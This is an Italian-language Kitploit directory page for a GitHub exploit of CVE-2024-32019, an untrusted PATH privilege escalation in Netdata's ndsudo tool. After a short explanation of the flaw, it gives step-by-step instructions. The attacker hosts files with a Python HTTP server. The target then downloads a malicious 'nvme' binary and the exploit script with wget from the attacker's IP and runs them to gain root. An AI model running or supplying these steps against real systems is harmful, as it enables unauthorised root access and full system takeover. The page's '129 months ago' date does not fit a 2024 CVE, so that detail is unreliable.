Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-32019-ndsudo — Exploit di escalation dei privilegi basato su Bash per CVE-2024-32019 nello strumento ndsudo dell'agente Netdata, che sfrutta la ricerca PATH non attendibile per eseguire binari arbitrari con privilegi di root. | Kitploit
Strumenti/GitHubGitHub/justjoeyking/cve-2024-32019-ndsudo
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed Teaming
GitHubjustjoeyking/cve-2024-32019-ndsudo

CVE-2024-32019-ndsudo

Exploit di escalation dei privilegi basato su Bash per CVE-2024-32019 nello strumento ndsudo dell'agente Netdata, che sfrutta la ricerca PATH non attendibile per eseguire binari arbitrari con privilegi di root.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
129 mesi faNon ancora revisionato

La vulnerabilità ndsudo consente a un attaccante di ottenere permessi di root sfruttando un percorso di ricerca non attendibile nello strumento ndsudo, che fa parte dell'Agente Netdata. Ciò può consentire l'esecuzione di programmi arbitrari con privilegi elevati se l'attaccante posiziona un binario malevolo in una directory scrivibile e modifica di conseguenza la variabile d'ambiente PATH.

La vulnerabilità ndsudo, identificata come CVE-2024-32019, colpisce le versioni dello strumento ndsudo incluse nell'Agente Netdata, in particolare le versioni v1.45.0 e precedenti. Questa vulnerabilità consente agli attaccanti di escalare i privilegi sui sistemi in cui lo strumento è installato.

Come funziona la vulnerabilità:

Meccanismo di sfruttamento:-

Percorso di ricerca non attendibile: Lo strumento ndsudo utilizza la variabile d'ambiente PATH per localizzare i comandi esterni. Un attaccante può manipolare questa variabile per puntare a una directory che controlla.

Esecuzione di binari malevoli: Posizionando un eseguibile malevolo con lo stesso nome di un comando che ndsudo è autorizzato a eseguire (ad esempio, nvme) in una directory scrivibile, l'attaccante può eseguire codice arbitrario con permessi di root.

Complessità dell'attacco:-

Bassa complessità: L'attacco non richiede competenze avanzate; uno script bash facilmente realizzabile può essere utilizzato per l'escalation, rendendolo accessibile a molti potenziali attaccanti.

Impatto della vulnerabilità:-

Escalation dei privilegi: Lo sfruttamento riuscito consente a un attaccante di ottenere accesso root, che può portare al pieno controllo del sistema interessato.

Rischi potenziali: Ciò può comportare accesso non autorizzato ai dati, manipolazione del sistema e ulteriore sfruttamento delle risorse di rete.

ESCALATION DEI PRIVILEGI Ho creato due script bash per ottenere facilmente accesso da utente a root. Segui i passaggi come indicato di seguito:-

root@kitploit:~
  git clone https://github.com/justjoeyking/CVE-2024-32019-ndsudo.git

  cd CVE-2024-32019-ndsudo

  chmod +x ndsudo_exp.sh

Ora crea un server python:

root@kitploit:~
  python3 -m http.server 8080

Apri il file ndsudo_exploit.sh usando gedit o pluma, a seconda di quale sia disponibile. Potrai vedere il comando wget in questo modo:

root@kitploit:~
  wget http://10.10.14.70:8080/nvme -o /tmp/nvme

Cambia l'indirizzo IP con l'IP della tua macchina

Ora vai sulla macchina target, apri il terminale e fai quanto segue:

root@kitploit:~
  wget http://<your-ip-addr>:8080/ndsudo_exploit.sh

  chmod +x ndsudo_exploit.sh

  ./ndsudo_exploit.sh
Scarica lo strumento